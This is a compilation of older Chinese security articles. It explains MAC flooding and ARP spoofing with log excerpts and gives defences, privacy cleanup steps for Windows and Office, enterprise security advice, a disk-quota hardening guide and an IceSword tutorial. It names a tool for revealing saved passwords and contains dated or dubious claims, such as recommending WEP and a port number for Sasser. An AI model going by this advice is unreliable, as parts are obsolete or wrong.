Switch上同样维护着一个动态的MAC缓存，它一般是这样，首先，交换机内部有一个对应的列表，交换机的端口对应MAC地址表Port n Mac记录着每一个端口下面存在那些MAC地址，这个表开始是空的，交换机从来往数据帧中学习。因为MAC-PORT缓存表是动态更新的，那么让整个Switch的端口表都改变，对Switch进行MAC地址欺骗的Flood，不断发送大量假MAC地址的数据包，Switch就更新MAC-PORT缓存，如果能通过这样的办法把以前正常的MAC和Port对应的关系破坏了，那么Switch就会进行泛洪发送给每一个端口，让Switch基本变成一个HUB，向所有的端口发送数据包，要进行嗅探攻击的目的一样能够达到。也将造成Switch MAC-PORT缓存的崩溃，如下下面交换机中日志所示：

Internet 172.20.156.1 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.5 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.254 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.53 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.33 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.13 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.15 0 000b.cd85.a193 ARPA Vlan256

Internet 172.20.156.14 0 000b.cd85.a193 ARPA Vlan256

当局域网内某台主机运行ARP欺骗的木马程序时，会欺骗局域网内所有主机和路由器，让所有上网的流量必须经过病毒主机。其他用户原来直接通过路由器上网现在转由通过病毒主机上网，切换的时候用户会断一次线。切换到病毒主机上网后，如果用户已经登陆了传奇服务器，那么病毒主机就会经常伪造断线的假像，那么用户就得重新登录传奇服务器，这样病毒主机就可以盗号了。

由于ARP欺骗的木马程序发作的时候会发出大量的数据包导致局域网通讯拥塞以及其自身处理能力的限制，用户会感觉上网速度越来越慢。当ARP欺骗的木马程序停止运行时，用户会恢复从路由器上网，切换过程中用户会再断一次线。

在路由器的“系统历史记录”中看到大量如下的信息：

MAC Chged 10.128.103.124

MAC Old 00:01:6c:36:d1:7f

MAC New 00:05:5d:60:c7:18

这个消息代表了用户的MAC地址发生了变化，在ARP欺骗木马开始运行的时候，局域网所有主机的MAC地址更新为病毒主机的MAC地址（即所有信息的MAC New地址都一致为病毒主机的MAC地址），同时在路由器的“用户统计”中看到所有用户的MAC地址信息都一样。

如果是在路由器的“系统历史记录”中看到大量MAC Old地址都一致，则说明局域网内曾经出现过ARP欺骗（ARP欺骗的木马程序停止运行时，主机在路由器上恢复其真实的MAC地址）。

2 预防在先，重要的规避措施

建议用户在可实施的情况根据以下的建议，对网络环境进行重新配置，以避免ARP攻击在网络环境中发生。

a) 不要把你的网络安全信任关系建立在IP基础上或MAC基础上，（rarp同样存在欺骗的问题），理想的关系应该建立在IP+MAC基础上。

b) 设置静态的MAC-->IP对应表，不要让主机刷新你设定好的转换表。

c) 除非很有必要，否则停止使用ARP，将ARP做为永久条目保存在对应表中。

d) 使用ARP服务器。通过该服务器查找自己的ARP转换表来响应其他机器的ARP广播。确保这台ARP服务器不被黑。

e) 使用""proxy""代理IP的传输。

f) 使用硬件屏蔽主机。设置好你的路由，确保IP地址能到达合法的路径。（静态配置路由ARP条目），注意，使用交换集线器和网桥无法阻止ARP欺骗。

g) 管理员定期用响应的IP包中获得一个rarp请求，然后检查ARP响应的真实性。

h) 管理员定期轮询，检查主机上的ARP缓存。

3 第一步，监控攻击行为和源头

当然，不是所有的网络里面都可以有效的规避此类病毒行为的发作，这个时候可以建立相应的预警机制，使管理员在第一时间发现此类攻击行为，并得知攻击源。有多种工具和方式，以下几种方法罗列供参考，可视自己的网络设备条件酌情使用。

2.1. 第三方IDS或者有IDS功能的防火墙

打开IDS或者防火墙关于检测ARP 欺骗（Spoofing）攻击的设置，并设置触发措施来通知到管理员，从而在第一时间得知ARP欺骗攻击，并得知攻击源的Mac地址。详细方法请参考相关的IDS和防火墙的说明或者技术支持

2.2. 第三方工具

使用AntiArpSniffer定位ARP攻击源。在你的网络里面，找一台机器运行此工具，并定期来监控此工具的检测情况。

工具下载地址：http://www.colorsoft.com.cn/soft/AntiArpSniffer3.zip

a) 功能简介：

帮助侦测定位网络中Arp攻击的来源，并保证遭受Arp攻击的网络中的主机在执行该工具的自动保护功能后能正常的与网关通信

b) 使用说明：

防御ARP欺骗

• 开启Anti ARP Sniffer,输入网关IP地址，点击［枚取MAC］如你网关填写正确将会显示出网关的MAC地址。

• 点击 [自动保护] 即可保护当前网卡与网关的正常通信。

追踪ARP攻击者：

当局域网内有人试图与本机进行ARP欺骗，其数据会被Anti ARP Sniffer记录。在欺骗数据详细记录表中选择需要追踪的行，然后点击［追捕欺骗机］，就能查找到攻击源。

2.3. 趋势OfficeScan客户端防火墙

趋势科技OfficeScan客户端防火墙不久将具备监控并预防ARP欺骗的功能，请关注近期的产品通知。

4 第二步，恢复网络

通过以上方法可以快速发现此类攻击行为，并得知攻击源的MAC地址。

这个时候你有两种方法来快速恢复网络。如果你的二层交换机支持单个端口的配置，那么封锁此网卡连接的交换机的端口。

否则，你需要通过资产管理资料，找到这台机器的物理位置，拔调此机器的网线。某些网络可能难以通过MAC地址找到机器的物理位置，这个时候需要用一些迂回的方式，比如大家都不能联网的时候，有一台机器可以，那么一般来说这个机器就是攻击源了。

通过以上两种方式隔离此机器后，等ARP缓存更新后，其他机器即可正常联网。一般来说MS Windows高速缓存中的每一条记录包括ARP的生存时间一般为60秒。

5 第三步，分析并提取ARP攻击源可疑样本

在攻击源机器上，可疑样本收集及处理：

1. 收集信息给趋势科技技术支持中心：使用SIC以及Hijackthis收集，ARP攻击源系统日志进行分析，查找其中的可疑项目。如遇有无法收集有效信息的情况（病毒采用Rootkit技术进行自身的隐藏），使用Icesword（Rootkit检测工具）检查是否有隐藏项目，在Icesword中隐藏的进程、文件和服务会以红色显示。

2. 根据收集的信息收集可疑样本给趋势科技，或者有任何困难和疑惑，请立即联系趋势科技技术支持中心。

3. 趋势科技将提供病毒码以及清除码DCT

附注：

Icesword下载地址：

ftp://202.38.76.151/pub2/Kernel/Windows/tools/IceSword1.18.rar

堵住日常操作易泄密的漏洞

堵住日常操作易泄密的漏洞

进入Windows 9X/2000中的一切操作，无论是工作、学习或娱乐，自进入Windows系统开始，都将被Windows以及它所有的服务（程序）记录在案，并保存在硬盘中,此项“功能”原本是系统设计者为了方便用户而设置的，但会成为泄露您所进行的工作的漏洞。窥探者在您刚用过的计算机中查找一阵后，就会发现大量信息：已经被您删除的收到和发出的邮件、您访问过的Internet网站、搜索规则及您在网页表单中输入的数据。这些“记录”可能会把您的“隐私”泄露，使您的信息安全受到威胁，这也许是您所不希望发生的。泄密的漏洞都在哪儿？

“运行”记录

使用Windows 9X“开始”选单中的“运行”选单项运行程序或打开文件，退出后，“运行”中运行过的程序及所打开文件的路径与名称会被记录下来，并在下次进入“运行”项时，在下拉列表框中显示出来供选用。这些“记录”会被窥视，需要清除。

通过修改注册表项可以达到清除这些“记录”的目的。首先通过Regedit进入注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Explorer\RunMRU这时在右边窗口将显示出“运行”下拉列表显示的文件名，如果您不想让别人知道某些记录的程序名，将它们删除就可以了。具体方法是：用鼠标选中要删除的程序，再选注册表编辑口的“编辑”选单中的“删除”项，“确认”即可。关闭计算机后，再启动计算机，刚才删除的项就不再显示出来了。

“历史” 记录

用IE 5.X 浏览器浏览文件后，在Windows\History文件夹中将“自动”记录最近数天（最多可记录99天）的一切操作过程，包括去过什么网站、看过什么图片等信息。这个文件夹相当独特，不能进行备份，但会暴露您在网上的“行踪”。不想让他人知道您的“历史”的话，记住删除Windows\History文件夹中的一切。有两种方法可以将“历史”记录删除：

方法一，从资源管理器中进入该文件夹并删除其中的所有文件；方法二，单击“开始”→“设置”→“控制面板”→“Internet属性”→“常规”标签，在“网页保存在历史记录中的天数”输入框中敲入“0”→“应用”（或“清除历史记录”）按钮。

“剪贴板”中的信息

剪贴板是Windows平台上程序之间静态交换“住处”的驿站，它是由Windows在内存中开辟的临时存储空间。不管什么时候剪切、复制和粘贴信息，在新的信息存入之前或是退出Windows之前，都一直保存着已有的“内容”信息。而且，Word 2000（包括Office 2000家族系列软件）的“剪贴板”可以存储12个“剪切”信息。所以，需要保守您的“秘密”的话，可不能忽略了“剪贴板”啊！

“文档”选单

“开始”的“文档”选单中，以快捷方式“保存”着您最近使用过的约15个文件（包括您刚从网上Download下来并打开过的文件）。通过它，我们可以迅速地访问一段时间前编辑过的文档。但对于那些使用计算机编辑个人文件或机密文件的朋友们来说，这种设置却会向他人泄露自己的秘密。

清除方法：

单击“开始”→“设置”→“任务栏和开始选单”，点击“开始选单程序”栏目下的文档项目的“清除”按钮，就把“文档”选单中的历史记录全部清除掉。若要不完全清除，从资源管理器中进入\windows\Recent文件夹，删除需要删除的项目即可。

“被挽救的文档”

我们在使用Word 97/2000等Office软件的过程中，有时会遇到“非法操作”提示，或是操作中机器突然掉电等一些意外情况，这样，在硬盘中（一般是安装Office软件的分区的根目录）或桌面上会冒出一些“被挽救的文档”，这些“被挽救的文档”，可能就是您刚刚编辑的文稿的全部或部分内容。所以，要提防“秘密”在此泄露：删除它！

Office的“文件”选单

大家知道，使用Microsoft Office家族的Word、office/9.shtml target= _blank class= article >Excel等软件进行工作后，会在“文件”选单中留下“记录”，由于“工具”的“选项”中设置“列出最近所用文件数”的不同，“文件”选单“记录”数也不同，但都会记录下您最新的操作。不想让他人知道的话，可按“Ctrl + Alt + -（减号）”键，光标会变成一个粗“减号”，打开“文件”选单后，用粗“减号”单击需要删除的文档即可。也可在Word中单击“工具”选单→“选项”→“常规”标签→选择“列出最近所有文件”选项，在其后的输入框中输入“0”，最后单击“确定”按钮。

Word 2000等Office 2000系列软件的“打开”对话框新增了一个“历史”按钮，利用它可以快速打开最近使用过的数十个文档。所以，此处也须提防。

Temp中的“物件”

我们常用的Word 97/2000和其他应用程序通常会临时保存您的工作结果，以防止意外情况造成损失。即使您自己没有保存正在处理的文件，许多程序也会保存已被您删除、移动和复制的文本。这些“内容”被存放在\Windows\Temp目录下。应定期删除各种应用程序在\Windows\Temp文件夹中存储的临时文件，以清除上述这些零散的文本。还应删除其子目录中相应的所有文件。虽然很多文件的扩展名为TMP，但它们其实是完整的DOC文件、HTML文件，甚至是图像文件。

还有，在Foxmail中打开邮件的“附件”，也会在\Windows\Temp文件夹中留下“备份”。所以，对于\Windows\Temp文件夹中近乎“纯垃圾”的内容，一定不要忘记予以坚决地清除。

Foxmail的“废件箱”

Foxmail 3.0 beta2及以后的版本，提供了和“回收站”类似的“废件箱”，Foxmail在清除“废件箱”中的邮件时并没有真正将其从硬盘上删除，而是像数据库系统那样只是打上删除标记而已，只有用户执行“压缩”操作之后被删除邮件才会被真正删除，这就为窥视者提供了恢复被删除邮件的可能。

所以，在公用计算机上使用 3.0 beta2及以后版本的Foxmail，记住把不需要的信件从“收件箱”清除时，按“Shift+Del”直接删除，使其不转入“废件箱”，并对邮箱进行压缩。

“日志”文件

存放在Windows目录下的Schedlog.txt是“计划任务”的“日志”，忠实地记录了“以往计划任务的执行情况”，以及您每次开机启动Windows系统的“时刻”信息，可以用任何字处理软件打开它。所以，您的“开机”及一些“任务”（程序）的执行信息，都会由此“暴露”。

要修改Schedlog.txt删除您的“行踪”记录吗？需要费一些周折，因为，用Windows系统下的任何编辑软件都只能打开但不能做修改后保存。例如，“记事本”打开“Schedlog.txt”后，可以在屏幕上做添加、删除等编辑操作，试图将改动过的“Schedlog.txt”存盘时，系统提示“无法创建文件C:\Windows\Schedlog.txt，请确定路径及文件名是否正确。”，按“确定”按钮后，自行退出“记事本”。即使进入Windows的MS-DOS方式，用“Edit”编辑也不行！只能以纯DOS方式启动计算机，再去Del、Edit或……随您的便，怎样处置这个“Schedlog.txt”都成！

使用OICQ后

若是按默认目录安装，那么，在C:\Program Files\oicq\下可以看到许多账号。双击进入任意一个账号，可以看到.cfg的文件，那是本账号的配置文件。还会有很多.msg文件，.msg文件的文件名就是您的OICQ的朋友的账号。如果有Tempfiles.tmp文件，通常是其他人用“语音传送”发来的声音文件，Tempfiler.tmp通常是本账号用户发给其他人的声音文件，可以用录音机打开播放。

解决的办法（很简单，也很有效）：

下网后删除自己用的账号目录，尤其是在“网吧”。下次使用时选注册向导，选“使用已有的OICQ号码”，再逐步注册就行。

曾访问的网页

为了加快浏览速度，IE会自动把您浏览过的网页作为“临时文件”，保存在\Windows\Temporary Internet Files 文件夹中，这些“记录”文件会被MS IE Cache Explorer一类的程序一览无遗。

解决办法：

从资源管理器中进入该文件夹中，全选所有网页，删除即可。或者打开IE属性，在“常规”栏目下单击“Internet 临时文件”项目的“删除文件”按钮（这种方法不太彻底，会留少许Cookies在目录内）。如果浏览过的网页较少且希望保留部分网页时，在上述目录中查找并删除不想要的网页即可。
“小甜饼”

Cookie翻译为中文就是“小甜饼”。打开\Windows\Cookies，该目录下有很多Cookies！这些“小甜饼”都是一些网站“白送”的，当您访问这些网站时，它们便会自动记录您所访问的内容、浏览的网页，并“储存”在Cookies中，以便下次达到快速链接，加快浏览速度。\Windows\Cookies文件夹中的“数据”，类型如yyy@202.102.224.68[1]，大都是：Windows用户名+ @ + 域名或IP地址，并以文本文件形式保存。“小甜饼”多了，不但会撑破硬盘肚皮，而且会暴露您的行踪。所以，不能贪图“甜”，该舍弃的就要扔！

解决办法：

将\Windows\Cookies文件夹中的文件（除系统自身所形成的“Index.dat"外），删除掉。

浏览过的地址（URL）

下网后，按一下地址栏的下拉选单，已访问过的站点无一遗漏尽在其中。怎么办？用鼠标右键点击桌面上的IE图标，打开属性，在“常规”栏目下点历史记录项目的“清除历史记录”。若只想清除部分记录，单击浏览器工具栏上的“历史”按钮，在右栏的地址历史记录中，用鼠标右键选中某一需要清除的地址或其下的一网页，选取“删除”。

注意，在Win 98/2000中，还有一处“隐藏”的“地址”栏，它同样会记录您曾去过的网址。该“地址”栏在“任务栏”上（在“任务栏”的空白处单击鼠标右键→“工具栏” →选择“地址”），在这个“地址”栏中输入网址便能激活IE浏览器上网，输入的网址就被记录下来。还好，此处的“记录”被放在Windows\History文件夹中，非常容易清除。在此说明的是，不要因为IE浏览器的“地址”栏和资源管理器的“地址”栏中没“记录”，就觉得“完事”了。

“拨号口令”

很多用户喜欢让Windows替他来记住口令，即建立拨号连接后，随着“连接到”窗口的出现，输入用户名，再输入登录口令（即密码），输入时密码以星号（“*”）的形式出现在口令栏中，在下面的“保存口令”前打勾，这样每当出现“连接到”窗口时您就不必重复输入用户名和口令了。但是，使用Revelation 这个大小只有70kB的软件可以轻松地得到您的密码。为了安全起见，建议不要在“保存口令”前打勾了。

另外，在\Windows文件夹中 .PWL文件记录着拨号上网的账户，注意删除掉。

文档的“属性”信息

对于存储在公用计算机的Word文档，许多用户采取设定“打开权限密码”以防止未经授权用户打开的办法，来防止泄露有关该文档的信息。但是，该文档的“属性”信息，会帮“倒忙”——泄密。

Word 97的“属性”对话框包括“常规”、“摘要信息”、“统计信息”、“内容”和“自定义”五张选项卡。自动存储到“摘要信息”选项卡上的信息有三项，“作者”、“单位”和安装Word时输入的用户信息。第一次保存文档时，将文档中第一行的内容存放到“标题”框中（通常是您写作的“题目”）。

查看文档的“属性”对话框，虽然依据文件名无法判断出文档的内容，但“摘要信息”选项卡“标题”框中（该文档第一行）的内容，却会泄露文档的秘密。由于“打开权限密码”只限制打开文档，并不限制打开“属性“对话框，所以，“标题”框是一个易被忽视的泄密漏洞。

堵住这个泄密漏洞的方法是：第一次保存文档后，打开“属性”对话框，将“摘要信息”选项卡上“标题”框中的内容删除（“内容”选项卡上的内容就会自动删除）即可。

ACDSee 32看图程序的“记录”

在默认的情况下，ACDSee 32看图程序的历史记录是“隐藏”的。但若是这样：单击“工具”选单→“选项”→“浏览”标签→选择“显示路径框”，按“确定”按钮，那么，您以前看过的图片就会显露。 ACDSee 32看图程序的历史记录，在其“工具”栏的下方。清除方法是，用Regedit打开注册表，展开左窗口的“HKEY_CURRENT_USER\Software\ACD Systems\ACDSee32”分支，再把ACDSee32主键对应的右窗口的“HistFileFilers”、“HistFindScope”和“HistPaths”三项内容删除即可。

“收藏夹”中的记录

大多数朋友上网时，常把喜爱的网址添加到“收藏夹”中，甚至设置为“允许脱机使用”，其优点当然是便于下次快速地进行浏览。但您的爱好和兴趣就必然暴露给他人了。\Windows\Favorites文件夹，即是“收藏夹”的位置，要想清除“收藏夹”中的历史记录，只要进入它，选中目标文件，执行“删除”操作即可。

“记事本”和“写字板”中的记录

记事本的历史记录保存与否，受制于Windows系统的设置。以Win 98为例，若保存，则仅存在于Win 98的“文档”选单中，而写字板的历史记录则同时存在于它的“文件”选单和Win 98的“文档”选单中。

对于“文档”中的记录很容易清除，这里不再赘述。至于“写字板”中的记录，可用修改注册表的方法来清除：用Regedit打开注册表，展开“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Applets\Wordpad\Recent FileList”分支，将其对应的主键值全部删除，再重新启动计算机，即可清除写字板的“文件”选单中的历史记录。

“回收站”

“回收站”是已删文件的暂时存放处。在“清空回收站”之前，存放在那里（回收站）的文件并没有真正从硬盘上删除。Windows操作系统，除了在“桌面”上放置一个图标为灰色的“垃圾筒”外，在每个硬盘（分区）的根目录下建立了一个隐藏属性的文件夹——Recycled，这个“Recycled”子目录（文件夹）就是回收站实际的位置所在。窥探者可以从“回收站”中恢复（还原）被删除的文件，发现您的工作内容。所以，每次结束操作，离开计算机之前，要记住“清空回收站”。

其它地方

Windows的“附件”中的“画图”、“娱乐”用的“Windows Media Player ”等工具，其“文件”选单都蕴藏着丰富的记录，不可小视。

WPS 97/2000、CCED 2000等字表处理软件的“文件”选单，也饱含着最近编辑（或打开查看）的文件，同样需要做清理。

好了，不再危言耸听了！本文的介绍，只是希望给朋友们有所启示：电脑应用中存在着一些“副”作用，需要引起足够的注意，以更好、更安全地使电脑为我们服务。

建立防火墙的主动性网络安全防护体系

·防火墙选择

防火墙和其它反病毒类软件都是很好的安全产品，但是要让你的网络体系具有最高级别的安全等级，还需要你具有一定的主动性。

你是不是每天都会留意各种黑客攻击、病毒和蠕虫入侵等消息？不过当你看到这些消息时，也许你的系统已经受到攻击了。而现在，我要给你介绍一种更具主动性的网络安全模型，通过它，就算再出现什么新病毒，你也可以对企业的网络系统感到放心。

类似于防火墙或者反XX类软件(如反病毒、反垃圾邮件、反间谍软件等)，都是属于被动型或者说是反应型安全措施。在攻击到来时，这类软件都会产生相应的对抗动作，它们可以作为整个安全体系的一部分，但是，你还需要建立一种具有主动性的安全模型，防护任何未知的攻击，保护网络安全。另外，虽然在安全方面时刻保持警惕是非常必要的，但是事实上很少有企业有能力24小时不间断的派人守护网络。

在实现一个具有主动性的网络安全架构前，你需要对现有的主流网络安全体系有一个大概的了解。防护方法包括四个方面：防火墙、VPN、反病毒软件，以及入侵检测系统(IDS)。防火墙可以检测数据包并试图阻止有问题的数据包，但是它并不能识别入侵，而且有时候会将有用的数据包阻止。VPN则是在两个不安全的计算机间建立起一个受保护的专用通道，但是它并不能保护网络中的资料。反病毒软件是与其自身的规则密不可分的，而且面对黑客攻击，基本没有什么反抗能力。同样，入侵检测系统也是一个纯粹的受激反应系统，在入侵发生后才会有所动作。

虽然这四项基本的安全措施对企业来说至关重要，但是实际上，一个企业也许花费了上百万购买和建立的防火墙、VPN、反病毒软件以及IDS系统，但是面对黑客所采用的“通用漏洞批露”(CVE)攻击方法却显得无能为力。CVE本质上说是应用程序内部的漏洞，它可以被黑客利用，用来攻击网络、窃取信息，并使网络瘫痪。据2004 E-Crime Survey(2004 电子犯罪调查)显示，90%的网络安全问题都是由于CVE引起的。

·怎样实现网络防火墙作用

具有主动性的网络安全模式是对上述四种安全措施的综合管理，使得用户可以从这四种安全措施中获得最大的安全性，同时也是为用户添加一个漏洞管理系统。在这种系统中，一个更有效的防火墙可以正确的拦截数据资料。一个更有效的反病毒程序则更少机会被激活，因为攻击系统的病毒数量更少了。而IDS则成为了一个备份系统，因为很少人能入侵系统而激活报警机制。而使用漏洞管理系统来防止CVE带来的入侵则是整个系统最重要的部分。

为什么这么说呢？从上面提到的调查看，95%的攻击是由于系统的漏洞或对系统的错误配置而造成的。在现实生活中也是一样，大家都试图将窃贼拒之门外，而很少考虑到当盗贼已经进入屋子后该怎防护。正如你不会在外出时让大门敞开，为什么不给网络再加一把锁呢。

实现主动性的网络安全模型

那么作为一家企业的技术人员，你该如何保护企业的网络呢？下面我会介绍几个简单的步骤，帮助你实现一个具有主动性的安全网络。首先你需要开发一套安全策略，并强迫所有企业人员遵守这一规则。同时，你需要屏蔽所有的移 动设备，并开启无线网络的加密功能以增强网络的安全级别。为你的无线路由器打好补丁并确保防火墙可以正常工作是非常重要的。之后检查系统漏洞，如果发现漏洞就立即用补丁或其它方法将其保护起来，这样可以防止黑客利用这些漏洞窃取公司的资料，或者令你的网络瘫痪。以下是各个步骤的实现细节： 　

开发一个安全策略

实现良好的网络安全总是以一个能够起到作用的安全策略为开始的。就算这个安全策略只有一页，公司的全体人员包括总经理在内，都必须按照这个策略来执行。基本的规则包括从指导员工如何建立可*的密码到业务连续计划以及灾难恢复计划(BCP和DRP)。比如，你应该有针对客户的财产和其它保密信息的备份策略，比如一个镜象系统，以便在灾难发生后可以迅速恢复数据。在有些情况，你的BCP和DRP也许需要一个“冷”或“热”的站点，以便当灾难发生或者有攻击时你可以快速将员工的工作重新定向到新的站点。执行一个共同的安全策略也就意味着你向具有主动性安全网络迈出了第一步。

·各项具体工作

减少对安全策略的破坏

不论是有限网络，还是笔记本或者无线设备，都很有可能出现破坏安全策略的情况。很多系统没有装防病毒软件、防火墙软件，同时却安装了很多点对点的传输程序(如Kazaa、Napster、Gnutella、BT、eMule等)以及即时消息软件等，它们都是网络安全漏洞的根源。因此，你必须强制所有的终端安装反病毒软件，并开启Windows XP内建的防火墙，或者安装商业级的桌面防火墙软件，同时卸载点对点共享程序以及乱七八糟的聊天软件。

封锁移动设备

对于企业的网络来说，最大的威胁可能就是来自那些随处移 动的笔记本或其它移 动终端，它们具有网络的接入权限，可以随时接入公司的网络。但是正因为它们具有移 动特性，可以随着员工迁移到其它不安全的网络并暴露在黑客的攻击之下，当这些笔记本电脑再次回到公司的网络环境时，就成了最大的安全隐患。其它无线终端也和笔记本有类似的情况。

据Forrester Research调查，到2005年，世界总共将有3500万移 动设备用户，而到2010年，这个数字将增加到150亿。我们不是数学家，不需要具体算出到底这些移 动设备会给企业的网络增加多少受攻击的几率，只需要知道这将是企业网络安全所面临的巨大考验。任何一个系统都有可能由于未经验证的用户的访问而被感染。

通过安全策略，你可以让网络针对无线终端具有更多的审核，比如快速检测到无线终端的接入，然后验证这些终端是否符合你的安全策略，是否是经过认证的用户，是否有明显的系统漏洞等。

开启无线网络加密功能

在无线网络系统中，无线网络加密 (Wireless Encryption，WEP)应该处于开启状态，并应该设置为最高安全级别。而且管理者的用户名和密码需要经常及时更换。但是这些措施也并不能够完全防止黑客通过你的无线路由器入侵企业内部网络。这是由于在大多数无线路由器中，都包含有目前尚未被修补的CVE，黑客可以利用这些CVE进行攻击。一些高级的黑客会下载免费的工具对这些漏洞进行更高级的利用，以此完全攻破你的安全系统。

为无线路由器打补丁，并使用其自带的防火墙功能

我强烈建议用户在使用无线路由器时及时更新产品的固件，而且如果无线路由器有内置防火墙功能，一定学习如何使用并配置它，开启这个防火墙。你也可以限制同时接入无线路由器的用户数量，如果企业员工数量不是很多，完全没有必要让路由器设置为可以接纳无限多的用户。比如企业只有十五个员工，那么就设置无线路由器只能同时接入十五个连接好了。

·设置防火墙

设置你的防火墙

虽然防火墙并没有特别强的安全主动性，但是它可以很好的完成自己该做的那份工作。你应该为防火墙设置智能化的规则，以便关闭那些可能成为黑客入侵途径的端口。比如1045端口就是SASSER蠕虫的攻击端口，因此你需要为防火墙建立规则，屏蔽所有系统上的1045端口。另外，当笔记本或其它无线设备连接到网络中时，防火墙也应该具有动态的规则来屏蔽这些移 动终端的危险端口。

下载安装商业级的安全工具

目前与安全有关的商业软件相当丰富，你可以从网上下载相应的产品来帮助你保护企业网络。这类产品从安全策略模板到反病毒、反垃圾邮件程序等，应有尽有。微软也针对系统的漏洞不断给出升级补丁。所有这些工具都可以有效地提升网络的安全等级，因此你应该充分利用它们。

禁止潜在的可被黑客利用的对象

“浏览器助手(BHO)”是最常见的可被黑客利用的对象。它一般用来监测用户的页面导航情况以及监控文件下载。BHO一般是在用户不知情的情况下被安装在系统中的，由于它可以将外界的信息存入你的系统，因此对网络安全来说是一个威胁。有些人利用BHO对象开发出了间谍软件，并尽量将起隐藏起来。一般来说，间谍软件都会不断变种，尽量避免被流行的间谍软件检测程序所发现，直到间谍软件检测程序进行了升级。如果你想看看自己的系统中到底有多少BHO，可以从Definitive Solutions公司的网站上下载BHODemon工具进行检测。

·注意事项

BHO是通过ADODB流对象在IE中运行的。通过禁止ADODB流对象，你就可以防止BHO写入文件、运行程序以及在你的系统上进行其它一些动作。要禁止ADODB流对象，你可以访问微软的技术支持页面。

留意最新的威胁

据计算机安全协会 (CSI)表示，2002 CSI/FBI计算机犯罪和安全调查显示，“计算机犯罪和信息安全的威胁仍然不衰退，并且趋向于金融领域”。因此，你需要时刻留意网络上的最新安全信息，以便保护自己的企业。网络上很多地方可以提供最新的安全信息。

弥补已知的漏洞

系统上已知的漏洞被称为“通用漏洞批露”(CVEs)，它是由MITRE组织汇编整理的漏洞信息。通过打补丁或其它措施，你可以将网络中所有系统的CVE漏洞弥补好。目前通过工具软件，你可以快速检测系统的CVE漏洞并将其修补好。有关这方面更多的信息，你可以查阅cve.mitre.org网站。

总的来说，一个具有主动性的网络安全模型是以一个良好的安全策略为起点的。之后你需要确保这个安全策略可以被彻底贯彻执行。最后，由于移 动办公用户的存在，你的企业和网络经常处在变化中，你需要时刻比那些黑客、蠕虫、恶意员工以及各种互联网罪犯提前行动。要做到先行一步，你应该时刻具有主动性的眼光并在第一时刻更新的你安全策略，同时你要确保系统已经安装了足够的防护产品，来阻止黑客的各种进攻尝试。虽然安全性永远都不是百分之百的，但这样做足可以使你处于优势地位。

用Windows磁盘配额增强系统安全

在大多数情况下黑客入侵远程系统必须把木马程序或后门程序上传到远程系统当中。如何才能切断黑客的这条后路呢?NTFS文件系统中的磁盘配额功能就能帮助用户轻松实现对磁盘使用空间的管理。

1.首先右击系统中一个NTFS分区，选择“属性”，可以打开“分区属性设置窗口”，选择其中的“配额”选项。首先勾上“启用配额管理”和“拒绝将磁盘空间给超过配额限制的用户”，这时所有的配额选项将变为可选状态。

2.接着选中“磁盘空间限制”选项，这时我们就可以在其中规定系统中用户使用磁盘空间的大小，如1KB。这样如果用户在分区中传入了一个大于1KB的文件，那么该文件将遭到系统拒绝，无法顺利地传入到该分区当中。

3.同理在“磁盘空间限制”选项下还有一个“警告级别”选项，如果设置了警告级别的文件大小，当用户在使用磁盘空间的过程中超出了警告级别的大小，系统将提示用户该文件超出了磁盘配额中的警告级别。

4.最后用户可以勾选上“用户超出配额限制时记录事件”和“用户超出警告等级时记录事件”两个选项，这样如果系统中有其他用户超出了分区的警告等级和配额限制，系统将把这些事件自动记录到系统日志当中，非常有利于管理员对系统分区空间的监控

5.当完成这些配置选项设置之后，点击窗口下的“确定”按钮，即可完成对磁盘配额功能的初步配置，这时用户可以惊奇地发现，原本还有很多剩余空间的分区，现在可用空间变得所剩无几。

6.这时用户已经无法向这个分区中写入大于配额的文件。并且这个配置对于系统中所有的用户生效，包括Administrators组中的用户。

7.但是如果配置对系统中所有用户生效的话，显然很不方便用户对系统的操作，而在磁盘配额功能中还提供了一个针对不同用户划分使用空间的功能。实现方法也非常简单。首先点击配额配置窗口中的“配额项”按钮，这时会弹出“分区配额项目”的窗口，点击窗口左上方的“配额”选项，再选择其中的“新建配额项”，这时会弹出一个选择用户的窗口，在其中填入或者选择系统中的一个用户名(如XieWei)，确定之后就会出现一个针对该用户使用磁盘空间限制的选项，而大家可以根据该用户在系统中的权限和使用情况，合理地为该用户指定使用空间，这样配置既不影响系统常规的操作，同时也加强了系统的安全性。

黑客基础知识系列之Icesword简明教程

黑客基础知识系列之Icesword简明教程

作者：柳焚烟　来源：赛迪网安全社区

IceSword，也称为冰刀或者冰刃，有些地址简称IS，是USTC的PJF出品的一款系统诊断、清除利器。

清除流氓软件工具无数，为什么称之为第一利器呢，有如下的理由：

1）你是不是经常有文件删不掉？如CNNIC或者3721的文件？

2）是不是经常有注册表不让你修改？如CNNIC的注册表是它自动保护起来的

3）是不是经常有进程杀不掉，提示“无法完成”？

4）是不是浏览器有N多的插件？

5）是不是有一些程序运行的时候隐藏了进程和端口？

6) 是不是有一些流氓软件的文件在资源管理器下看都看不到？

1、绝大多数所谓的进程工具都是利用Windows的Toolhlp32或psapi再或ZwQuerySystemInformation系统调用（前二者最终也用到此调用）来编写，随便一个ApiHook就可轻轻松松干掉它们，更不用说一些内核级后门了；极少数工具利用内核线程调度结构来查询进程，这种方案需要硬编码，不仅不同版本系统不同，打个补丁也可能需要升级程序，并且现在有人也提出过防止此种查找的方法。而IceSword的进程查找核心态方案是目前独一无二的，并且充分考虑内核后门可能的隐藏手段，目前可以查出所有隐藏进程。

2、绝大多数工具查找进程路径名也是通过Toolhlp32、psapi，前者会调用RtlDebug***函数向目标注入远线程，后者会用调试api读取目标进程内存，本质上都是对PEB的枚举，通过修改PEB就轻易让这些工具找不到北了。而IceSword的核心态方案原原本本地将全路径展示，运行时剪切到其他路径也会随之显示。

3、进程dll模块与2的情况也是一样，利用PEB的其他工具会被轻易欺骗，而IceSword不会弄错（有极少数系统不支持，此时仍采用枚举PEB）。

